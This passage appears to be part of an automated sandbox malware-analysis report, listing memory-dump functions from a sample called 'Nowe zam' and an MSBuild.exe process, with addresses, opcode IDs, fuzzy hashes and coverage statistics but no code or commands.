Instruction ID: dabf9775695e0fde3931424f8ce0f8223ccdff5ffe6e0ec508e330ff69633d93
Opcode Fuzzy Hash: ad5e06660f0f2aa41dff74798d7605012b262074d03df0ff5d06263ad95e7d2a
Instruction Fuzzy Hash: 9F829E74A00209DFCB25CF68D998EAEBBF2FF88300F158569E506DB661D731E945CB60

Function 050F3F00 Relevance: .5, Instructions: 506COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2347126493.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50f0000_Nowe zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 358b15a36ea358022c90ef54340fd73bc9c8da15bb0addfc99d117b939adf48a
Instruction ID: 5f847261f424a93f897e6b99c53a485a877ac2832f437b324f74bca098180fbf
Opcode Fuzzy Hash: 358b15a36ea358022c90ef54340fd73bc9c8da15bb0addfc99d117b939adf48a
Instruction Fuzzy Hash: E0428274E01219CFEB64CF69D984B9EBBF2BF48310F1481A9E909A7355D734AA81CF50

Function 050F2C30 Relevance: .5, Instructions: 482COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2347126493.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50f0000_Nowe zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39dddbc8f416e0b2727b5bfdef9523a56303eabf9303c1eb827b3ba0f5631d06
Instruction ID: 120f2e4627b88a0a92ee9a00da1b647994fc1fafcbd729ea677b92d18a83e460
Opcode Fuzzy Hash: 39dddbc8f416e0b2727b5bfdef9523a56303eabf9303c1eb827b3ba0f5631d06
Instruction Fuzzy Hash: D532CF74E002198FEB60DFA8C984A8EFBF2BB48355F55C1A5D549AB611CB309985CFA0

Function 090D0D90 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da05e0f0f6ac639c9f7e3db4a05b18b4cd34baa1ebdc416774e551428db59bf7
Instruction ID: c5ba88e13bf353cb353d6a899639a5b83f732207fd7b39de93a54ee7183cdaf7
Opcode Fuzzy Hash: da05e0f0f6ac639c9f7e3db4a05b18b4cd34baa1ebdc416774e551428db59bf7
Instruction Fuzzy Hash: E9E11C74E05259CFDB14DFA9C5809AEFBF2BF89304F248569E419A7356C7309942CFA0

Function 090D11C8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b4f1114757b5db0c23ea56e434f8c498e0ddb02d313ad4edb1428a0da29423b
Instruction ID: 15d482e518c8fae67beaa95ca004fa2a8d2976273824a5cd6cdbf5774621eff2
Opcode Fuzzy Hash: 7b4f1114757b5db0c23ea56e434f8c498e0ddb02d313ad4edb1428a0da29423b
Instruction Fuzzy Hash: 6DE13C74E05219CFDB54DFA9C5809AEFBF2BF89304F248169E415A7356CB30A942CFA0

Function 050FF718 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2347126493.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50f0000_Nowe zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2db5cfc8719b4e87579fa86e4699cb1b1e10c33e055949f7b840cba35509b38
Instruction ID: 89560f7d427b10d2e58fac142de3798b69e02346898aa19aab7a0e9970c783d6
Opcode Fuzzy Hash: a2db5cfc8719b4e87579fa86e4699cb1b1e10c33e055949f7b840cba35509b38
Instruction Fuzzy Hash: DBE10A74E0425ACFDB14DFA9D580AAEFBF2BF88304F248169D515A7356D730A942CFA0

Function 050F66E0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2347126493.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50f0000_Nowe zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f452e7b23922475d41794cfb1f08023a9d45ea2edcb84826c97fd92bd637186c
Instruction ID: 112e8b53c19e7d36f27eff79eb503ab994c13cffb78cf924602675973a4e9867
Opcode Fuzzy Hash: f452e7b23922475d41794cfb1f08023a9d45ea2edcb84826c97fd92bd637186c
Instruction Fuzzy Hash: 39E11674E042198FDB14DFA9D580AAEBBF2FF89304F248169D515AB359C731A942CFA0

Function 050FF2E0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2347126493.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50f0000_Nowe zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0770ddb4c56fd33098b5ff025d26fd8a29869c7a865210985fe0c28f92a6835
Instruction ID: 56d8521769ec921529b43cb1ca34c40241c244c9e2dc5af8eb556730c910bc36
Opcode Fuzzy Hash: b0770ddb4c56fd33098b5ff025d26fd8a29869c7a865210985fe0c28f92a6835
Instruction Fuzzy Hash: 53E10B74E0025A8FDB14DFA9D5809AEFBF2BF89304F248169D515A7356DB30A942CFA0

Function 050FFB50 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2347126493.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50f0000_Nowe zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9fd7b15f707ba05a3910fb73f809c2ab5ecc6f8c1f7e0233a21a6cb0132b197
Instruction ID: 2d655f540559718acd739b834dc408aa5c514738fa724d9880ea407f932f6883
Opcode Fuzzy Hash: e9fd7b15f707ba05a3910fb73f809c2ab5ecc6f8c1f7e0233a21a6cb0132b197
Instruction Fuzzy Hash: 71E11B74E0425A8FDB14DFA8D5809AEFBF2BF89304F248169D515AB356D730AD42CFA0

Function 050F7890 Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2347126493.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50f0000_Nowe zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b68ed6c094e7b25112e38630884674ef4dac680d37a8df41c71cd049d72870c4
Instruction ID: cd20c6b9319b94ab9819dedbe1fac95ad695d5d32f73fb337086b02dd34d1cdb
Opcode Fuzzy Hash: b68ed6c094e7b25112e38630884674ef4dac680d37a8df41c71cd049d72870c4
Instruction Fuzzy Hash: 2EE12A3092164BCADB14EB74D990ADDB7B1FF95300F51CB9AE40937221EB706ACACB51

Function 050F78B8 Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2347126493.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50f0000_Nowe zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04c1a43181606bd48f7616b4468f370729bfc6bf599b52b61dd206728e4bc406
Instruction ID: ff823ac2c24eebebf1cdf0b58718fa031b39427ade525010b4dd7539e3068976
Opcode Fuzzy Hash: 04c1a43181606bd48f7616b4468f370729bfc6bf599b52b61dd206728e4bc406
Instruction Fuzzy Hash: A8D11A3182164BCADB14EB74D990ADDB7B1FF95300F51CB9AE40937221EB706ACACB51

Function 0097D66C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2342810574.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_Nowe zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51cac6c8840967834a7f94f454f28d4df7189b4f46a14ee2c1f82146d067d7d4
Instruction ID: 20f04b2b9a37bec77e106a30ea3996f02f02e6d25c96b2352632dd85e3157dd4
Opcode Fuzzy Hash: 51cac6c8840967834a7f94f454f28d4df7189b4f46a14ee2c1f82146d067d7d4
Instruction Fuzzy Hash: ACA16B36E012198FCF19DFA4C85469EB7B6FF84300B15857AE80ABB261DB71E915CB40

Function 050F78C8 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2347126493.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50f0000_Nowe zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dc96f60ddee14822a64b65f1a21b453030e0d881fc4d18b58b2b6636af171c5
Instruction ID: 37dcf58c360e2f428c7f8e0649b2bb5d038c27a5a2cc0a3c76f861f8c56b8375
Opcode Fuzzy Hash: 6dc96f60ddee14822a64b65f1a21b453030e0d881fc4d18b58b2b6636af171c5
Instruction Fuzzy Hash: 97D1083082164BCADB14EB74D990ADDB7B1FF95300F51CB9AE40937221EB706AC5CB91

Function 050F8E70 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2347126493.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50f0000_Nowe zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b3f6d037cce9318ed2afe2bebd8eba0b150b92992be0b96af4cc3b981d0decc
Instruction ID: 718c82a857786a43c91a1e3cf44efd8ba71a35f28e9724fff5bdfb66e4ae9577
Opcode Fuzzy Hash: 3b3f6d037cce9318ed2afe2bebd8eba0b150b92992be0b96af4cc3b981d0decc
Instruction Fuzzy Hash: 6C718175E002189FDB04DFAAD984AEEFBF2BF88300F14C166E819AB255D7349946CF50

Function 050F3EF0 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2347126493.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50f0000_Nowe zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ff3fa33fe4251ee0ed4d0de02a8b37c3fadc9ca11e4a2b6f011ba4bfcc37fd6
Instruction ID: 3542d72ef409067b989fde40809581defbee960651a9a1f87a9629bc7ac286b4
Opcode Fuzzy Hash: 2ff3fa33fe4251ee0ed4d0de02a8b37c3fadc9ca11e4a2b6f011ba4bfcc37fd6
Instruction Fuzzy Hash: EF61B475E01218DFEB18CF66D995BDEBBB2BF88300F1481A9E809A7354DB359942CF50

Function 090D11C5 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f0efaa1c95e5f077ba04ca3a76fbf3b99f88b8b6c33df91aa2b0c8042f0bf0e
Instruction ID: b7739e086b478194685b45b2ca781221bc29182dda263ae5d24f0cd20b97fa22
Opcode Fuzzy Hash: 4f0efaa1c95e5f077ba04ca3a76fbf3b99f88b8b6c33df91aa2b0c8042f0bf0e
Instruction Fuzzy Hash: F2513A70E052198FDB18DFA9C5809AEFBF2BF89304F248569E419A7315DB319942CFA0

Function 050F8E60 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2347126493.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50f0000_Nowe zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 560dd856c96991de3910309b83a092b689d672e61ebda543af93fe407ea72d20
Instruction ID: 209b7d707da147bb840695d49b35a0ffd4139f3c843e6408f2afd674de5f85a2
Opcode Fuzzy Hash: 560dd856c96991de3910309b83a092b689d672e61ebda543af93fe407ea72d20
Instruction Fuzzy Hash: 6D518075E006589FDB08CFAAD98469EFBF2BF88300F14C16AD819AB319DB345946CF50

Function 050FFB41 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2347126493.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50f0000_Nowe zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfdde883f2f9c158f58ee9bbe80b7989085e14382f5245c8a9cad10ff9c56455
Instruction ID: 9c13c40971b6e78aa8c7fe6c5071a05d4396f897c3bec94bd00f9606c71c46ee
Opcode Fuzzy Hash: cfdde883f2f9c158f58ee9bbe80b7989085e14382f5245c8a9cad10ff9c56455
Instruction Fuzzy Hash: 10512A74E0021A8FDB14DFA9C5809AEFBF2BF89304F248169D519AB356D7309942CFA0

Function 050F2C22 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2347126493.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50f0000_Nowe zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 506d90c39c0f12929513bd7a8693a4666792ece2559763b49311ed9a6e3ccd06
Instruction ID: b6fb58714879a749fac95c96ee26ae5a25d1795745d3b1bcb3ac04f650125e07
Opcode Fuzzy Hash: 506d90c39c0f12929513bd7a8693a4666792ece2559763b49311ed9a6e3ccd06
Instruction Fuzzy Hash: 0E41EC75E006198FEB58CFAAD84179EBBB2BFC8300F14C0AAD559E7255DB340A868F51

Analysis Process: MSBuild.exePID: 1016, Parent PID: 6828COMMON

Execution Graph

Execution Coverage:	18%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	7%
Total number of Nodes:	57
Total number of Limit Nodes:	11

Executed Functions

Function 065B9328 Relevance: 2.0, APIs: 1, Instructions: 533
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.4778360792.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_65b0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dd34bb50585fe7a215bd5bf073025c3eaf8f91b5dc6e1f14741ecf04c909edf
Instruction ID: 6ebf29ad4059f7fd1cdd16c5db6220853c8da41a549bb593545aff0bd733c6f9
Opcode Fuzzy Hash: 4dd34bb50585fe7a215bd5bf073025c3eaf8f91b5dc6e1f14741ecf04c909edf
Instruction Fuzzy Hash: CB224774E002188FDB54DFA8C880BDDBBB2BF89304F1495A9E549AB395DB349D85CF90

Function 00F2A088 Relevance: .9, Instructions: 893COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 163bcfe87c029582b63779bfab5ba70ac3f25cbd8306db891871f5b9ae539ddf
Instruction ID: 7114e295888365c705bdc577dbea9308325dcfd9926388f9d372d342c7682ccb
Opcode Fuzzy Hash: 163bcfe87c029582b63779bfab5ba70ac3f25cbd8306db891871f5b9ae539ddf
Instruction Fuzzy Hash: C0826A71A00219CFCB15CFA8D984AAEBBF2BF88310F158569E405DB2A1D735ED81DF52

Function 00F269A0 Relevance: .5, Instructions: 510COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ea0b3c9444e27ad34cb864edc2ba11ed934adb2aaf81f2c88cf3adf29708a87
Instruction ID: cba42873c90713e39a79a737cf83aa198b8c7830766b10202c16ce9a466e5ce7
Opcode Fuzzy Hash: 2ea0b3c9444e27ad34cb864edc2ba11ed934adb2aaf81f2c88cf3adf29708a87
Instruction Fuzzy Hash: B6127F71A002299FDB14DF69D854BAEBBF2BF88310F248529E406EB395EB349D41DF50

Function 00F26FC8 Relevance: .5, Instructions: 461
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78bd7a5f15a23e971b7d38b5431bd288491b0aa0a801e83914ce51847b7ba900
Instruction ID: 9699e0a43ba1bb7034121538efac17ee1d5bb48dc876ebb32b088a6c038a97ed
Opcode Fuzzy Hash: 78bd7a5f15a23e971b7d38b5431bd288491b0aa0a801e83914ce51847b7ba900
Instruction Fuzzy Hash: 49124031A04229DFCB15EF69E844AAEBBF2BF48310F158069E815EB261D734ED41EF51

Function 00F23E09 Relevance: .4, Instructions: 419
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0a7107c92c48868e81aca2992cc16a02afb74333bab876ff9f894d0c6e7db4f
Instruction ID: f84e58f2a036afb16781308ea47afe82b77d7d3538c1a763d7a7727b0d031b1a
Opcode Fuzzy Hash: d0a7107c92c48868e81aca2992cc16a02afb74333bab876ff9f894d0c6e7db4f
Instruction Fuzzy Hash: 09F1AE35E05258CFDB08DFB5E8506AEBBB2BF89300B14856AE906E7354DF359C02DB51

Function 00F23A99 Relevance: .3, Instructions: 287
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9df6d208b3542ad58d829a2550f59194085105aacbddfde361fe4e530e41e71a
Instruction ID: 6d36f21a4d3a6de02a62354b603ec97b0c57fb230aa2a7072bfe8cfced37bcf5
Opcode Fuzzy Hash: 9df6d208b3542ad58d829a2550f59194085105aacbddfde361fe4e530e41e71a
Instruction Fuzzy Hash: 99A1C9A3D8D7E05FDB62867808F81A77FB18BA350478844AFD4C382596F95CD606D352

Function 00F2C147 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6213a3c01aa29c1ace273853d1caaaf365c951da745eb8d2c25b459ef7d7cc6
Instruction ID: 151d077d0d004ba1e3dd7e14bddaa48f39e623134f9676cc67a6753164578639
Opcode Fuzzy Hash: b6213a3c01aa29c1ace273853d1caaaf365c951da745eb8d2c25b459ef7d7cc6
Instruction Fuzzy Hash: 4CA1D475E00228DFDB14DFAAD894A9DBBF2BF89310F148069E409AB365DB349D41DF90

Function 00F25370 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f750b443443cec2eaf415a20fcce23e50262023c6d840434415da245f4bb3690
Instruction ID: be51a675dde82ebf88c0cc8df25203dd29a0680236f6fa82d24e65c799761f64
Opcode Fuzzy Hash: f750b443443cec2eaf415a20fcce23e50262023c6d840434415da245f4bb3690
Instruction Fuzzy Hash: 8F81C374E01628CFDB14DFAAD894B9DBBF2BF88314F148069E409AB365DB349981DF50

Function 00F2C468 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd4f493bf304b11012fb98529b85190fa9211bd2d16b97b8f35823df447f67d9
Instruction ID: fc058b9874c2c3d6119b29105826fd6a1edea8a7129d624d8d3a8c34926348fe
Opcode Fuzzy Hash: cd4f493bf304b11012fb98529b85190fa9211bd2d16b97b8f35823df447f67d9
Instruction Fuzzy Hash: 6481C274E00228CFDB14DFAAD894B9DBBF2BF88310F249069E409AB365DB349941DF50

Function 00F2D278 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5b130f9f505a41b6b3880fb658c722c623c767f0e594729250b77338f667123
Instruction ID: 3e2e0b7eb71a849ad08da951b0751242629cbea9429b604eaad8bee71f602f82
Opcode Fuzzy Hash: a5b130f9f505a41b6b3880fb658c722c623c767f0e594729250b77338f667123
Instruction Fuzzy Hash: 9881B274E01218CFEB14DFAAD884B9DBBF2BF89310F248069E409AB365DB349945DF10

Function 00F2CA08 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a784b35363f0b5daabc21df17a12a070a606dc21906a7e640b1b68f7e5e9a13a
Instruction ID: 21d91ce0d6162f8871c9ac9071db4dca3cf51007c3a05b28e994dff50f6a31a6
Opcode Fuzzy Hash: a784b35363f0b5daabc21df17a12a070a606dc21906a7e640b1b68f7e5e9a13a
Instruction Fuzzy Hash: 5B81A174E01218CFDB14DFAAD894B9DBBF2BF88310F248069E409AB365DB749945DF50

Function 00F2CCD8 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee2096f90bdf8b150be3219ec771df29fe44f1d0bc2c9e6a5669f1bfa2083bf2
Instruction ID: 855683962e1fca638ad2cb17d014ee54c05471b160864b22b03093b3fe0f1e56
Opcode Fuzzy Hash: ee2096f90bdf8b150be3219ec771df29fe44f1d0bc2c9e6a5669f1bfa2083bf2
Instruction Fuzzy Hash: 3581B274E00218CFDB14DFAAD894B9DBBF2BF88310F258069E409AB365DB349945DF50

Function 00F2CFAA Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6da8c5e41984c0f59ebc0fa0dc1d0004f5b5ddbed47e7196b9cc7f118ead655e
Instruction ID: 6dfe07affb4ab5bb1e35152a0d72e9773c6f07b337d4a1e2bed043b498530e67
Opcode Fuzzy Hash: 6da8c5e41984c0f59ebc0fa0dc1d0004f5b5ddbed47e7196b9cc7f118ead655e
Instruction Fuzzy Hash: A381B574E01218CFEB14DFAAE984B9DBBF2BF88310F148069E409AB365DB349945DF50

Function 00F2C738 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b09efd1ccef2cf6240de5502523274e418dd1e8cd5ea47c89d87b113902686b8
Instruction ID: 166cbfc6e532c7f71da2446b403ea3674d4b9a0446f7f6fd9d82dc26992dc824
Opcode Fuzzy Hash: b09efd1ccef2cf6240de5502523274e418dd1e8cd5ea47c89d87b113902686b8
Instruction Fuzzy Hash: 4B819174E01218CFDB14DFAAD994B9DBBF2BF88310F148069E409AB365DB345985DF50

Function 00F2F2C0 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae217ec2590553bebe221cbef9d96bb3a261048b95d591d9d2c7905fc535492e
Instruction ID: fc01b0cbdb2f3d635f5fd75dffff401d4b75d37da2683f65c4750e85e53e814c
Opcode Fuzzy Hash: ae217ec2590553bebe221cbef9d96bb3a261048b95d591d9d2c7905fc535492e
Instruction Fuzzy Hash: 9F513870D11228CBDB14EFA9E845B9EB7B2FB89300F248138E405AB294D7759D49DF54

Function 00F2E988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b016a9b2e8e30d9b5683eae73657ce65426acc597c1ab236b5eee6e3a88990ae
Instruction ID: 6e666be089aea57a8995b4381844c155cc9b5a58cc2ab3961b5689a53b8f03ea
Opcode Fuzzy Hash: b016a9b2e8e30d9b5683eae73657ce65426acc597c1ab236b5eee6e3a88990ae
Instruction Fuzzy Hash: 5B51C474E01218DFDB18DFAAD894A9DBBB2BF89300F249029E819AB365DB345D41CF14

Function 00F2F4AC Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05935ae08ef3a45a6b4a81e6eac863387bf079763069ddab88adfac45fbb1b88
Instruction ID: 065526d5935c2272bab83efcc90b21387bedc62f2051248ccba6fdee2cf3a0d6
Opcode Fuzzy Hash: 05935ae08ef3a45a6b4a81e6eac863387bf079763069ddab88adfac45fbb1b88
Instruction Fuzzy Hash: A651F470D11228CFDB14EFA8E885BAEB7B1FB49314F248139E015AB294C7759D89EF50

Function 00F21A79 Relevance: 3.8, Strings: 3, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PG, xrefs: 00F21B10
PG, xrefs: 00F21B47
PG, xrefs: 00F21B64

Memory Dump Source

Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd

Similarity

API ID:
String ID: PG$PG$PG
API String ID: 0-4102702343
Opcode ID: be9b7706e86f809435bed899f74c2f94f120660b078c057926a1350c8497056c
Instruction ID: c7b10f9a1f38dd0fe3f05fa2d3360c084dc2a4fef559bc2642c08487c496493c
Opcode Fuzzy Hash: be9b7706e86f809435bed899f74c2f94f120660b078c057926a1350c8497056c
Instruction Fuzzy Hash: 96315E74E01259DFCB04EFB4D8516AEBBB2FF85300F108969D415AB385DB38AA05DF91

Function 065B992C Relevance: 1.6, APIs: 1, Instructions: 62
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

